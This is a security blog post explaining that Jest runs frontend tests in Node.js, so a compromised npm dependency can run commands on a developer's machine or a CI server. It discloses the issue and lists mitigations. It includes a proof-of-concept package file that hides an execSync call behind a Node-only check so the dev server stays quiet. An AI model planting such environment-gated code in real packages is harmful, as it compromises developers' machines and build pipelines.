Another variant to compromise frontend developers via malicious packages
A few days ago I was watching "10 Things I Regret About Node.js", and the introduction to Deno started with this slide about security:

By default a script should run without any network or file system write access
It makes sense, especially for the frontend realm, where most of the time we’re developing code to be run in a browser, and in a browser you don’t have, for example, file system write access.
In this post my target persona is going to be a frontend developer who develops code that will only run in the browser. It’s important to mention that this doesn’t take into account SSG or SSR, since they could add more variants to consider (I’m going to comment on that later). In terms of execution, the frontend developer runs the project as a regular user on the operating system (no container or virtual machine).
The developer trusts the security mechanisms and boundaries integrated into the browser. Let’s take the case of a package, part of a project’s dependencies, that is compromised and whose new release contains malicious code. Should the developer be worried about a malicious package trying to execute code on their local machine? The answer is yes.
In this post I’m going to review the known techniques so far and their mitigation measures, and introduce another variant (I couldn’t find a previous reference to it) to achieve code execution when a user runs the test suite. It was reported last May to Facebook Bug Bounty but, according to them, it seems to be part of the project’s features. They gave me the OK to speak about it publicly.
Threat analysis for frontend developers
Imagine there’s a malicious package in your dependencies and this package is used in your application. How many ways could you be pwned?
- At package installation, via package scripts: this can be mitigated using the ignore-scripts directive.
- The malicious code gets executed when your application is running in the browser, leading to client-side code execution (as in a Cross-Site Scripting).
- Executing the malicious logic because it’s part of a script that you call locally using NodeJS.
- In the case of SSG/SSR, where some code is meant to run server side, you could be affected in the same way as a backend developer: a malicious package could achieve remote command execution on your local machine.
If you can think of new scenarios, I’m open to updating this list!
From my experience, the target persona could be affected mostly by the first two. The third case is not that common in simple setups, and the fourth one only applies if you’re doing SSG/SSR, which is not the case for this example.
So this target persona could set the ignore-scripts directive.
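As a minimal sketch, with npm the directive can be set per project in an .npmrc file (Yarn 1 offers an equivalent --ignore-scripts flag for yarn install):

```ini
# .npmrc: skip lifecycle scripts (preinstall, install, postinstall) when installing packages
ignore-scripts=true
```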
With that in place, any other impact of a malicious package would be at browser level. Is that enough? No, because there’s another, less known variant that I want to introduce.
Code execution in the test suite
Nowadays most software projects have a test suite. When you use a utility like create-react-app to initialize a React application, it adds a test runner (Jest) and a little test suite. From the documentation about testing we can read:
Jest is a Node-based runner. This means that the tests always run in a Node environment and not in a real browser. This lets us enable fast iteration speed and prevent flakiness.
While Jest provides browser globals such as window thanks to jsdom, they are only approximations of the real browser behavior. Jest is intended to be used for unit tests of your logic and your components rather than the DOM quirks.
At first it was a bit confusing, since Jest has a configuration option called testEnvironment that can be set to either jsdom or node. As it’s set to jsdom by default, I thought that Jest used jsdom to execute the tests inside the environment created by jsdom, but that’s not the case: the tests still run in a Node process, and jsdom only provides browser-like globals. Let’s see the security implications of that behavior.
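For reference, outside create-react-app (which manages this internally) the option would live in the standalone Jest configuration, roughly like this:

```js
// jest.config.js (a minimal sketch): with either value the tests execute in a
// Node.js process; 'jsdom' only layers browser-like globals (window, document) on top.
module.exports = {
  testEnvironment: 'jsdom', // or 'node'
};
```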
We’re going to set up a React application using create-react-app. The steps are straightforward: npx create-react-app my-app && cd my-app. We’re going to import a React component from a local file called external-package.js, and we can draw the parallel with a third-party package since this import works in the same way (so from this point on we will call it external-package). This is the content of external-package.js
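(a minimal sketch; the component name ExternalPackage is illustrative):

```jsx
import React from 'react';

const ExternalPackage = () => <p>hello</p>; // renders a paragraph with "hello" as text

export default ExternalPackage;
```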
It’s a not so useful component that creates a paragraph with hello as text. Our App.js file is going to import this external-package component and make use of it in the application
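(lines 3 and 10 in the sketch below, which otherwise follows a trimmed-down version of the default create-react-app template):

```jsx
import React from 'react';
import logo from './logo.svg';
import ExternalPackage from './external-package'; // line 3: import the external-package component
import './App.css';

function App() {
  return (
    <div className="App">
      <header className="App-header">
        <ExternalPackage /> {/* line 10: render the external-package component */}
        <img src={logo} className="App-logo" alt="logo" />
      </header>
    </div>
  );
}

export default App;
```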
If we run the test suite, everything runs as expected (we run it with CI=true so it doesn’t start in interactive watch mode).

So now, what happens if external-package is compromised? Our threat analysis tells us that it could only affect the application running in the browser, but the fact that Jest runs the code using node means that the compromised package could contain valid NodeJS logic that will be executed when the test suite runs. Let’s see it in practice.
To give some real-world context, imagine that until now we were using external-package-1.0.0. An attacker manages to compromise the repository and publishes a new version, external-package-1.0.1, and at some point we update our local packages and get external-package-1.0.1 installed. The new version contains the following logic
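(sketched below; the exact environment check and payload are illustrative, any condition that only holds under Node.js would do):

```jsx
import React from 'react';

const ExternalPackage = () => <p>hello</p>; // unchanged component from 1.0.0

if (typeof process !== 'undefined' && process.versions && process.versions.node) { // line 5: only true under Node.js (e.g. Jest), never in the browser bundle
  console.log(require('child_process').execSync('id').toString()); // line 6: PoC payload: run the id command and log its output
}

export default ExternalPackage;
```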
In comparison with version 1.0.0, the attacker added lines 5 to 7. Line 5 checks that the script is being executed by node and not by the browser. It’s an important check to achieve a stealthy exploit; otherwise the yarn start dev server could warn us about errors in our application.

Our if statement makes yarn start work fine, so our frontend developer doesn’t detect the malicious code. In line 6 we call NodeJS’s execSync function to execute the id command and we log the command’s output to the console. Now, let’s run our test suite again.

Our id command is executed. Obviously we could do it stealthily without that console.log statement, but it’s just a proof of concept to show that the exploit works.
Impact
There are two scenarios where this attack could be carried out:
- A frontend developer running the test suite locally: this could lead to a full compromise of their local account.
- A continuous integration environment running the test suite and executing the malicious code.
I think everyone understands the scope of the first scenario. The second scenario, however, is alarming: I’d like to refer to this blog post about the story of a backdoor in a project called Webmin:
The vulnerability was secretly planted by an unknown hacker who successfully managed to inject a BACKDOOR at some point in its build infrastructure that surprisingly persisted into various releases of Webmin (1.882 through 1.921) and eventually remained hidden for over a year.
Developers confirmed that the official Webmin downloads were replaced by the backdoored packages only on the project’s SourceForge repository, and not on the Webmin’s Github repositories.
So a whole new set of cases could derive from malicious code being executed in CI environments:
- It could achieve persistent access to your CI infrastructure.
- It could insert malicious code into your releases, so the number of affected people increases exponentially.
The worst part is that this kind of attack is not easy to detect, since the attack happens on the CI servers and there are no traces in the code repository.
Mitigation measures
From my point of view, there are some mitigation measures worth putting in place:
- For development, put your frontend application in a container and run the test suite inside the container (a rough sketch follows this list).
- Use disposable containers to run your test suite in your CI environment, so any malicious code will have a limited scope in both time and impact. Disable networking if you don’t need it.
- To catch a compromised package: keep an eye on the commands executed, files accessed and network connections made by your test suite.
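As an illustration of the first two points (image name, paths and flags are just one possible choice), the test suite could be run in a throwaway container along these lines:

```sh
# Run install and tests inside a disposable container; anything the malicious
# code does is confined to the container (except for the mounted project folder).
docker run --rm \
  -v "$PWD":/app -w /app \
  node:lts \
  sh -c "yarn install --ignore-scripts && CI=true yarn test"
```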
This list is not exhaustive but it’s a good starting point to improve your security posture.
Thoughts about security
About Jest’s behavior, I think it should be mentioned in the documentation, because most people don’t consider this risk and therefore won’t be able to take the right measures.
From my point of view, Deno is on the right path by using a secure sandbox to run the code (in this case, the test suite). Looking at some online code editors, they mention that they run Jest in the browser, so it would be possible to run the test suite in a more secure manner.
In my opinion the issue is that there are two contexts, browser and server side, and each context should be handled separately or, at least, with security primitives to ensure the expected boundaries.